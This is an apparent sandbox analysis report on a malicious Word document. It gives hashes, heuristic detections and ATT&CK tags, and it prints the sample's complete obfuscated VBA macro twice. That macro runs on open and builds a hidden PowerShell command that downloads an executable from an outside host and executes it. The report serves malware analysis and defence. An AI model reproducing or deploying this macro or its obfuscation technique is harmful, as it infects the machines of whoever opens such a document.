Office (OLE) malware analysis — malicious · f0a1f8ca9c8c48b7

MALICIOUS

Office (OLE)

92.5 KB Created: 2017-01-07 02:06:00 Authoring application: Microsoft Office Word First seen: 2017-02-22

MD5: 566f6ce04fd9657b513d995e9bddf9fb SHA-1: 76278b3a09c274276170f7f1145c637a33d60d91 SHA-256: f0a1f8ca9c8c48b7657eb206096d6289432eed021b126dfe6c7b4d4707d97a95

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate

The file is a malicious Word document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_PCODE_AUTOEXEC_EXEC. The document body prompts the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The presence of the ClamAV detection 'Doc.Dropper.Agent-5551279-0' strongly suggests it functions as a dropper for further malicious activity. The VBA code itself is heavily obfuscated, making specific payload analysis difficult, but the overall intent is to execute code upon macro enablement.

Heuristics 7

ClamAV: Doc.Dropper.Agent-5551279-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-5551279-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

ujteqyvfy = yvawc & avywg2 & joqyzgakw0
Set ukkyje = CreateObject(ujteqyvfy)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
asoq
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9125 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9125 bytes
SHA-256: `6bc288dd31b87766e495b1bb8b6df083a3d5eed51bf8f42e9b2e508cc07a6a87`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Attribute VB_Name = "Module2" Attribute VB_Name = "mode" Sub asoq() Dim mx1, v, ne, yhj0, yvawc, xp0, bt, uv, r2, qd, w0, aks0, egc, h5, uw1, gi9, s3, ly, iq, db, ky, z6, c4, uh, i5, dko4, hu8, l6 If 940 = 170 Then Dim xakxowq xakxowq = False ' omzy ymi qsadatw ifdotesg anijlanip ceqmyw End If Dim o3, xle6, m3, x6, hc, aq, zk, ma8, oj, j0, joqyzgakw0, i, iws, cz0, fe, ry, hza3, igz, c, inj, bo, fr, e, e2, utk, o, qa7, pxu7, p, sf0, a4, llu4, de9, yk, lb, sw9, avywg2, di0 Select Case "mwukj" Case "izolne" Rem irycpo Rem wqazawmi hahnu obemnafyhg Rem wufwekyt End Select Dim qpy2, dv, tn, ju, kke, tco4, i4, mnu, qa2, ov, ga2, e7, bb0, gi, jj, a, u8, dt, wsy, gtu, sp, z5, uhc6, l, ov1, y, amx, ujteqyvfy, rly1, ir7, yp, hmy Select Case "efoflu" Case "iwwy" Rem yxrimeso erbafpyl sgudivuh riw Dim watdivi watdivi = "593" Dim ohbex ohbex = "orp" Case "izgasy" ' ebnawy guvoho lhig kfosu knajcifsog nvusl Dim oslevum oslevum = 4360 Dim vwuked vwuked = 521 End Select Dim it4, a1, tro, unn7, u, em c = "'%A" Select Case "isgor" Case "dgicgi" Dim sdytxeja sdytxeja = #10/17/2015# Dim ypamfa ypamfa = #7/18/1989# Case "eb" Dim elagzalz elagzalz = "9775" Rem uwafifil snaqtavdopv ' kxacpehybi hycbeqd ugodp arlola absybofw Dim inowum inowum = "ocafy" Case "gxe" Dim alozp alozp = True Rem ofuknu Dim pyty pyty = "ykmeher" Dim orxagil orxagil = #9/9/2000# End Select x6 = "cMd" h5 = "oBJ" ju = "els" Select Case "icsu" Case "asre" ' eja keregkerr win hajju lgyn yhpiko vcyky ' lahesny tekpuk ogonfopqe ' adpumafm zdyxmo End Select m3 = "PPD" sf0 = "Yp^" gi9 = "xE'" ly = "hEL" ma8 = "dat" uhc6 = "BCL" uw1 = "eSs" Rem irypaxz rifalewj nlivvihc ywvyfwuja tersan pejibewwy hmy = "%.e" Select Case 66 Case 633 Rem ugefe Rem fec ujwi kylorxegbe Rem emihafkomx lyjbycdah ' yky kihhurqorl pzyplolta szahjebw onhige Case 607 Rem npap nbuwfo apfytto uwhinzavon Dim ptujy ptujy = 2089 ' dvyjy wvezy ptazhedxelk ijripe kidzon ' tjatoqwe hkitv wfesa urxymijuj uxmukon cowhefsetqi Case 920 Rem anlezhejugb ekto ibvocqobxef obubu dihu Dim gsajfu gsajfu = False ' ihiqhy zihantuc oxo Rem yhnu ihup azkukhevymx izehonmek ynuxy End Select amx = "^e^" If "jusz" = "xoma" Then Rem edocevo yvqu lewil ajexidu lnode dzahacajl gewiqyfc Rem yczukyx zcyny mipgate edibt iholab fgakipuw End If dt = "ATA" j0 = "WNL" Select Case "ernat" Case "cihs" Rem forageb dolmazzucku ojfefhen ekyvh Case "ecxyto" Dim tybdakj tybdakj = #9/19/1997# Dim vexal vexal = #1/17/1967# Dim xlymive xlymive = 5434 End Select oj = "Pro" If "bycer" = "ufo" Then Rem wdub ykyg End If v = "xE " ga2 = " ^-" mx1 = "r^o" kke = "alf" db = "FIl" s3 = "//c" Rem oqquny bt = "ion" a4 = "-wi" Dim stubfig stubfig = "3809" o3 = "tp:" xp0 = " -" yk = "Xe'" jj = ".co" If 333 = 681 Then Rem ulifhih vtafpeqme yhozn aro wury csazlyxgefy Dim upyty upyty = 8132 ' qecezne xiquqz azahno End If sw9 = "e /" iws = "sti" qpy2 = """" Select Case 231 Case 175 Dim nyfnamp nyfnamp = 5119 Dim bifhen bifhen = True Dim usowfarr usowfarr = #6/6/2019# Rem wuhevpykk egladzaxvu qidud End Select i = "sys" Dim ikupfy ikupfy = False c4 = "cho" Select Case "uxajfy" Case "pbamfe" ' ubqikole ragugo yjvegagra End Select qd = "iEN" If "azhemo" = "llekor" Then Dim opejakt opejakt = #1/19/2017# Dim kfimrakt kfimrakt = #3/2/1989# Dim dxorlekji dxorlekji = 2261 End If dv = "wsT" i5 = "',^" If "igk" = "yhulq" Then Rem emi onizuge vyrjihul yqojuse fuvytsodu vsyzqex umerboxpedl ' knefocne bkibypgoqj aciksunw gqocror ewpi kysu End If fr = ".Do" Select Case 624 Case 53 Dim sqihnyku sqihnyku = "7034" Rem ewunytd xhipwo ixo yfabzavre End Select e7 = "e^(" ' ocdyn ajce yfzarkykt xmakikr aknycef clyvq ttoslas = TypeName(ActiveDocument.CodeName) = "String" Dim hizbati hizbati = True wsy = "^Df" ' daz rcunykzuzo lefavow uflywnuxtit epo wpelafbu hu8 = "^c^" If "dip" = "bhywnikx" Then Rem ddyqke huwuvkot vlasp jqewboh dinbid nboq Dim ircosx ircosx = 666 Dim ednyq ednyq = #2/5/2020# End If de9 = "o^A" Select Case "ygove" Case "amer" Rem zbykmolraz yrzafocfaz xtuhesyty uvsyw rxawxosha ejpi xriqmo Dim hpimafj hpimafj = 2172 Dim yhogewx yhogewx = #2/12/1972# ' ulseskojr mvajbulukse ansalilvip pophac ujxylosa Case "qbulozc" Rem agbezoqv tgeble elsyhjyp ' evmehicmab ofpix kahet mdig imxodendaq Case "unfi" Dim afkuwu afkuwu = #4/23/1956# Rem rfazudf oji tosja oscehiga enyvenhec Dim yqkiqty yqkiqty = "1813" End Select gi = "W-^" uv = "u/t" qa2 = "PPD" Select Case 63 Case 487 Dim umuw umuw = #7/7/1989# ' gyky zawnuhadmu Dim ofyvcumg ofyvcumg = False Dim ahriznib ahriznib = 1436 End Select u8 = "po^" e = "nO^" If "sifu" = "qzugi" Then Rem jorka usdotg Rem atvobu ahuhzunna yzi udi ckim nyhyvzyw Dim expuq expuq = "pce" End If z6 = "^S^" u = "wER" Select Case "molne" Case "ocivw" Dim pywo pywo = #3/21/2010# End Select vve = "oun" Select Case "aksismi" Case "ihjo" Dim bmajri bmajri = "7685" Dim iwyf iwyf = 6122 ' lilzaj mapgacxyf mtezuxfo ydkaxuxiv wokke ahegryvg alca ' gyqdedme igimly ihhoxmaj End Select pxu7 = "ylE" Dim jxylzyvke jxylzyvke = #6/27/1959# joqyzgakw0 = "ell" Dim imnaj imnaj = "az" fe = ");s" If 945 = 970 Then Rem uxnazilz kolylyjzu apzi End If tn = "X^e" Select Case 648 Case 914 ' umaspy dbesu ipzem Dim npusuhr npusuhr = 2086 Case 153 Rem bibrawip zosytdikge lziban ppuplykomy hegoruty nehesby pnur End Select aq = "^ " llu4 = "^WE" Dim bburme bburme = "8139" i4 = " " iq = " HI" Dim qodle qodle = #12/13/1992# o = ".Ex" If 682 = 293 Then Dim yksyrt yksyrt = 7099 Dim aniz aniz = "jkytcapki" End If xle6 = "m/j" mnu = "'%A" igz = "p^O" inj = "jew" yvawc = "WScri" uh = "NDO" Rem huqugbiw yvhe lydna oqigdodyzb rdargigmal zkemupq egc = "st." tro = "^cY" Select Case 386 Case 741 ' zmuwanasj ache Rem asgoxn ctaxre gkynqy frug Dim zpurho zpurho = "jago" Case 954 Rem iqoxke qqezubale amyrjaxuj etxaxyxak uwet gqoxohnere Dim pyxik pyxik = 5062 Dim ycmaco ycmaco = "hewror" Dim ijwojy ijwojy = 9236 End Select z5 = "N^ " Dim lispehza lispehza = #6/4/2020# ov = "s/f" If 400 = 691 Then ' pqiwuqna efhagnuxmedb vkyhti okwudsegyfm fcewr njywqeksyx Dim mihy mihy = False End If p = "ine" em = "'ht" avywg2 = "pt.Sh" ne = " (^" If 866 = 586 Then Rem seted kxym mlyhla ' iqitvy ohisrafit tqezupek End If gtu = "M.N" Dim pyho pyho = 7949 unn7 = "exe" If "fojp" = "amo" Then Dim gjyqoli gjyqoli = #12/17/1971# Rem uhhy fezehaxq yxzakokkiqg oqsobwy End If di0 = "aSs" Dim icipu icipu = "2181" ir7 = "m.a" cz0 = "Et." Dim izapyl izapyl = #4/21/1966# w0 = "T^)" r2 = "T-p" aks0 = "/sv" Select Case "abh" Case "noz" Dim yflurx yflurx = 839 ' vzavalpuz yrjizkubi juhucu vyq iqupfi ybasgyp Rem lywexy laqy cizuzb oxqawpuvj iwenj ' toghyxatr ortirogx otamat dlidx olock End Select qa7 = " ^" ky = "Ect" Dim ymlufti ymlufti = #10/26/1969# a1 = " ^" Dim umint umint = #9/15/1961# obwiho = "" yhj0 = "c """ ov1 = "^ " bb0 = "te^" Select Case "uto" Case "ndyxba" ' ufyxilvoqh Rem nepeny jqaxatmi End Select tco4 = "Ne^" rly1 = "^e^" hc = "for" sp = "iON" Dim bceqofle bceqofle = False yp = "ypo" If 761 = 197 Then Dim yfycfudv yfycfudv = False Dim mkyti mkyti = "oppy" End If utk = "aTa" l = "cUT" If 878 = 95 Then ' asafi eri evasdagpe uhejisix ilqysowucg Rem ulbetpanh uczi koqicavv sqojd End If y = " b^" lb = " " dko4 = "ele" hza3 = "E^ " If 730 = 369 Then ' rgaxwo tkarg iculubd Dim ufobas ufobas = True Dim ucviwajx ucviwajx = "ofi" End If e2 = " ^" l6 = "^lI" ry = "TAr" Select Case 987 Case 74 Dim ofsugq ofsugq = True ' nvefge utxupuj ckizrept Dim cwenulo cwenulo = "538" Case 287 ' ejxynsija esbypy pima wqudletky rqognatridlo iwejpaxa sgilb Rem lfeku apoqordi ysydsa isuminsef ntedcybqyqv ysgi End Select bo = "Il^" zk = "l.E" Rem tlojq it4 = "%.E" a = "^DD" ujteqyvfy = yvawc & avywg2 & joqyzgakw0 Set ukkyje = CreateObject(ujteqyvfy) If ttoslas Then iqozj = Array(x6, o, sw9, yhj0, u8, u, z6, ly, zk, v, ga2, rly1, tn, l, sp, igz, l6, tro, aq, y, sf0, di0, xp0, e, oj, db, hza3, a1, a4, uh, dv, pxu7, lb, iq, a, amx, z5, ne, tco4, gi, h5, ky, i4, e2, i, bb0, gtu, cz0, llu4, uhc6, qd, w0, fr, j0, de9, wsy, bo, e7, em, o3, s3, dko4, iws, kke, p, inj, ju, jj, ir7, uv, yp, hc, xle6, ov, vve, ma8, bt, aks0, c4, egc, unn7, i5, c, m3, dt, it4, yk, fe, ry, r2, mx1, hu8, uw1, ov1, qa7, mnu, qa2, utk, hmy, gi9, qpy2) Select Case "ycy" Case "ide" Dim ypiwa ypiwa = 1257 Dim lfyhsaznu lfyhsaznu = "8227" End Select gqepa = Array(Join(iqozj, obwiho))(0) ukkyje.Run gqepa, False End If End Sub Sub AutoOpen() asoq End Sub

SHA-256: 6bc288dd31b87766e495b1bb8b6df083a3d5eed51bf8f42e9b2e508cc07a6a87

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "mode"
Sub asoq()
Dim mx1, v, ne, yhj0, yvawc, xp0, bt, uv, r2, qd, w0, aks0, egc, h5, uw1, gi9, s3, ly, iq, db, ky, z6, c4, uh, i5, dko4, hu8, l6
If 940 = 170 Then
Dim xakxowq
xakxowq = False
' omzy ymi qsadatw ifdotesg anijlanip ceqmyw
End If
Dim o3, xle6, m3, x6, hc, aq, zk, ma8, oj, j0, joqyzgakw0, i, iws, cz0, fe, ry, hza3, igz, c, inj, bo, fr, e, e2, utk, o, qa7, pxu7, p, sf0, a4, llu4, de9, yk, lb, sw9, avywg2, di0
Select Case "mwukj"
Case "izolne"
Rem irycpo
Rem wqazawmi hahnu obemnafyhg
Rem wufwekyt
End Select
Dim qpy2, dv, tn, ju, kke, tco4, i4, mnu, qa2, ov, ga2, e7, bb0, gi, jj, a, u8, dt, wsy, gtu, sp, z5, uhc6, l, ov1, y, amx, ujteqyvfy, rly1, ir7, yp, hmy
Select Case "efoflu"
Case "iwwy"
Rem yxrimeso erbafpyl sgudivuh riw
Dim watdivi
watdivi = "593"
Dim ohbex
ohbex = "orp"
Case "izgasy"
' ebnawy guvoho lhig kfosu knajcifsog nvusl
Dim oslevum
oslevum = 4360
Dim vwuked
vwuked = 521
End Select
Dim it4, a1, tro, unn7, u, em
c = "'%A"
Select Case "isgor"
Case "dgicgi"
Dim sdytxeja
sdytxeja = #10/17/2015#
Dim ypamfa
ypamfa = #7/18/1989#
Case "eb"
Dim elagzalz
elagzalz = "9775"
Rem uwafifil snaqtavdopv
' kxacpehybi hycbeqd ugodp arlola absybofw
Dim inowum
inowum = "ocafy"
Case "gxe"
Dim alozp
alozp = True
Rem ofuknu
Dim pyty
pyty = "ykmeher"
Dim orxagil
orxagil = #9/9/2000#
End Select
x6 = "cMd"
h5 = "oBJ"
ju = "els"
Select Case "icsu"
Case "asre"
' eja keregkerr win hajju lgyn yhpiko vcyky
' lahesny tekpuk ogonfopqe
' adpumafm zdyxmo
End Select
m3 = "PPD"
sf0 = "Yp^"
gi9 = "xE'"
ly = "hEL"
ma8 = "dat"
uhc6 = "BCL"
uw1 = "eSs"
Rem irypaxz rifalewj nlivvihc ywvyfwuja tersan pejibewwy
hmy = "%.e"
Select Case 66
Case 633
Rem ugefe
Rem fec ujwi kylorxegbe
Rem emihafkomx lyjbycdah
' yky kihhurqorl pzyplolta szahjebw onhige
Case 607
Rem npap nbuwfo apfytto uwhinzavon
Dim ptujy
ptujy = 2089
' dvyjy wvezy ptazhedxelk ijripe kidzon
' tjatoqwe hkitv wfesa urxymijuj uxmukon cowhefsetqi
Case 920
Rem anlezhejugb ekto ibvocqobxef obubu dihu
Dim gsajfu
gsajfu = False
' ihiqhy zihantuc oxo
Rem yhnu ihup azkukhevymx izehonmek ynuxy
End Select
amx = "^e^"
If "jusz" = "xoma" Then
Rem edocevo yvqu lewil ajexidu lnode dzahacajl gewiqyfc
Rem yczukyx zcyny mipgate edibt iholab fgakipuw
End If
dt = "ATA"
j0 = "WNL"
Select Case "ernat"
Case "cihs"
Rem forageb dolmazzucku ojfefhen ekyvh
Case "ecxyto"
Dim tybdakj
tybdakj = #9/19/1997#
Dim vexal
vexal = #1/17/1967#
Dim xlymive
xlymive = 5434
End Select
oj = "Pro"
If "bycer" = "ufo" Then
Rem wdub ykyg
End If
v = "xE "
ga2 = " ^-"
mx1 = "r^o"
kke = "alf"
db = "FIl"
s3 = "//c"
Rem oqquny
bt = "ion"
a4 = "-wi"
Dim stubfig
stubfig = "3809"
o3 = "tp:"
xp0 = "  -"
yk = "Xe'"
jj = ".co"
If 333 = 681 Then
Rem ulifhih vtafpeqme yhozn aro wury csazlyxgefy
Dim upyty
upyty = 8132
' qecezne xiquqz azahno
End If
sw9 = "e /"
iws = "sti"
qpy2 = """"
Select Case 231
Case 175
Dim nyfnamp
nyfnamp = 5119
Dim bifhen
bifhen = True
Dim usowfarr
usowfarr = #6/6/2019#
Rem wuhevpykk egladzaxvu qidud
End Select
i = "sys"
Dim ikupfy
ikupfy = False
c4 = "cho"
Select Case "uxajfy"
Case "pbamfe"
' ubqikole ragugo yjvegagra
End Select
qd = "iEN"
If "azhemo" = "llekor" Then
Dim opejakt
opejakt = #1/19/2017#
Dim kfimrakt
kfimrakt = #3/2/1989#
Dim dxorlekji
dxorlekji = 2261
End If
dv = "wsT"
i5 = "',^"
If "igk" = "yhulq" Then
Rem emi onizuge vyrjihul yqojuse fuvytsodu vsyzqex umerboxpedl
' knefocne bkibypgoqj aciksunw gqocror ewpi kysu
End If
fr = ".Do"
Select Case 624
Case 53
Dim sqihnyku
sqihnyku = "7034"
Rem ewunytd xhipwo ixo yfabzavre
End Select
e7 = "e^("
' ocdyn ajce yfzarkykt xmakikr aknycef clyvq
ttoslas = TypeName(ActiveDocument.CodeName) = "String"
Dim hizbati
hizbati = True
wsy = "^Df"
' daz rcunykzuzo lefavow uflywnuxtit epo wpelafbu
hu8 = "^c^"
If "dip" = "bhywnikx" Then
Rem ddyqke huwuvkot vlasp jqewboh dinbid nboq
Dim ircosx
ircosx = 666
Dim ednyq
ednyq = #2/5/2020#
End If
de9 = "o^A"
Select Case "ygove"
Case "amer"
Rem zbykmolraz yrzafocfaz xtuhesyty uvsyw rxawxosha ejpi xriqmo
Dim hpimafj
hpimafj = 2172
Dim yhogewx
yhogewx = #2/12/1972#
' ulseskojr mvajbulukse ansalilvip pophac ujxylosa
Case "qbulozc"
Rem agbezoqv tgeble elsyhjyp
' evmehicmab ofpix kahet mdig imxodendaq
Case "unfi"
Dim afkuwu
afkuwu = #4/23/1956#
Rem rfazudf oji tosja oscehiga enyvenhec
Dim yqkiqty
yqkiqty = "1813"
End Select
gi = "W-^"
uv = "u/t"
qa2 = "PPD"
Select Case 63
Case 487
Dim umuw
umuw = #7/7/1989#
' gyky zawnuhadmu
Dim ofyvcumg
ofyvcumg = False
Dim ahriznib
ahriznib = 1436
End Select
u8 = "po^"
e = "nO^"
If "sifu" = "qzugi" Then
Rem jorka usdotg
Rem atvobu ahuhzunna yzi udi ckim nyhyvzyw
Dim expuq
expuq = "pce"
End If
z6 = "^S^"
u = "wER"
Select Case "molne"
Case "ocivw"
Dim pywo
pywo = #3/21/2010#
End Select
vve = "oun"
Select Case "aksismi"
Case "ihjo"
Dim bmajri
bmajri = "7685"
Dim iwyf
iwyf = 6122
' lilzaj mapgacxyf mtezuxfo ydkaxuxiv wokke ahegryvg alca
' gyqdedme igimly ihhoxmaj
End Select
pxu7 = "ylE"
Dim jxylzyvke
jxylzyvke = #6/27/1959#
joqyzgakw0 = "ell"
Dim imnaj
imnaj = "az"
fe = ");s"
If 945 = 970 Then
Rem uxnazilz kolylyjzu apzi
End If
tn = "X^e"
Select Case 648
Case 914
' umaspy dbesu ipzem
Dim npusuhr
npusuhr = 2086
Case 153
Rem bibrawip zosytdikge lziban ppuplykomy hegoruty nehesby pnur
End Select
aq = "^  "
llu4 = "^WE"
Dim bburme
bburme = "8139"
i4 = "   "
iq = " HI"
Dim qodle
qodle = #12/13/1992#
o = ".Ex"
If 682 = 293 Then
Dim yksyrt
yksyrt = 7099
Dim aniz
aniz = "jkytcapki"
End If
xle6 = "m/j"
mnu = "'%A"
igz = "p^O"
inj = "jew"
yvawc = "WScri"
uh = "NDO"
Rem huqugbiw yvhe lydna oqigdodyzb rdargigmal zkemupq
egc = "st."
tro = "^cY"
Select Case 386
Case 741
' zmuwanasj ache
Rem asgoxn ctaxre gkynqy frug
Dim zpurho
zpurho = "jago"
Case 954
Rem iqoxke qqezubale amyrjaxuj etxaxyxak uwet gqoxohnere
Dim pyxik
pyxik = 5062
Dim ycmaco
ycmaco = "hewror"
Dim ijwojy
ijwojy = 9236
End Select
z5 = "N^ "
Dim lispehza
lispehza = #6/4/2020#
ov = "s/f"
If 400 = 691 Then
' pqiwuqna efhagnuxmedb vkyhti okwudsegyfm fcewr njywqeksyx
Dim mihy
mihy = False
End If
p = "ine"
em = "'ht"
avywg2 = "pt.Sh"
ne = " (^"
If 866 = 586 Then
Rem seted kxym mlyhla
' iqitvy ohisrafit tqezupek
End If
gtu = "M.N"
Dim pyho
pyho = 7949
unn7 = "exe"
If "fojp" = "amo" Then
Dim gjyqoli
gjyqoli = #12/17/1971#
Rem uhhy fezehaxq yxzakokkiqg oqsobwy
End If
di0 = "aSs"
Dim icipu
icipu = "2181"
ir7 = "m.a"
cz0 = "Et."
Dim izapyl
izapyl = #4/21/1966#
w0 = "T^)"
r2 = "T-p"
aks0 = "/sv"
Select Case "abh"
Case "noz"
Dim yflurx
yflurx = 839
' vzavalpuz yrjizkubi juhucu vyq iqupfi ybasgyp
Rem lywexy laqy cizuzb oxqawpuvj iwenj
' toghyxatr ortirogx otamat dlidx olock
End Select
qa7 = "  ^"
ky = "Ect"
Dim ymlufti
ymlufti = #10/26/1969#
a1 = "  ^"
Dim umint
umint = #9/15/1961#
obwiho = ""
yhj0 = "c """
ov1 = "^  "
bb0 = "te^"
Select Case "uto"
Case "ndyxba"
' ufyxilvoqh
Rem nepeny jqaxatmi
End Select
tco4 = "Ne^"
rly1 = "^e^"
hc = "for"
sp = "iON"
Dim bceqofle
bceqofle = False
yp = "ypo"
If 761 = 197 Then
Dim yfycfudv
yfycfudv = False
Dim mkyti
mkyti = "oppy"
End If
utk = "aTa"
l = "cUT"
If 878 = 95 Then
' asafi eri evasdagpe uhejisix ilqysowucg
Rem ulbetpanh uczi koqicavv sqojd
End If
y = " b^"
lb = "   "
dko4 = "ele"
hza3 = "E^ "
If 730 = 369 Then
' rgaxwo tkarg iculubd
Dim ufobas
ufobas = True
Dim ucviwajx
ucviwajx = "ofi"
End If
e2 = "  ^"
l6 = "^lI"
ry = "TAr"
Select Case 987
Case 74
Dim ofsugq
ofsugq = True
' nvefge utxupuj ckizrept
Dim cwenulo
cwenulo = "538"
Case 287
' ejxynsija esbypy pima wqudletky rqognatridlo iwejpaxa sgilb
Rem lfeku apoqordi ysydsa isuminsef ntedcybqyqv ysgi
End Select
bo = "Il^"
zk = "l.E"
Rem tlojq
it4 = "%.E"
a = "^DD"
ujteqyvfy = yvawc & avywg2 & joqyzgakw0
Set ukkyje = CreateObject(ujteqyvfy)

If ttoslas Then
iqozj = Array(x6, o, sw9, yhj0, u8, u, z6, ly, zk, v, ga2, rly1, tn, l, sp, igz, l6, tro, aq, y, sf0, di0, xp0, e, oj, db, hza3, a1, a4, uh, dv, pxu7, lb, iq, a, amx, z5, ne, tco4, gi, h5, ky, i4, e2, i, bb0, gtu, cz0, llu4, uhc6, qd, w0, fr, j0, de9, wsy, bo, e7, em, o3, s3, dko4, iws, kke, p, inj, ju, jj, ir7, uv, yp, hc, xle6, ov, vve, ma8, bt, aks0, c4, egc, unn7, i5, c, m3, dt, it4, yk, fe, ry, r2, mx1, hu8, uw1, ov1, qa7, mnu, qa2, utk, hmy, gi9, qpy2)
Select Case "ycy"
Case "ide"
Dim ypiwa
ypiwa = 1257
Dim lfyhsaznu
lfyhsaznu = "8227"
End Select
gqepa = Array(Join(iqozj, obwiho))(0)
ukkyje.Run gqepa, False
End If

End Sub
Sub AutoOpen()
asoq
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.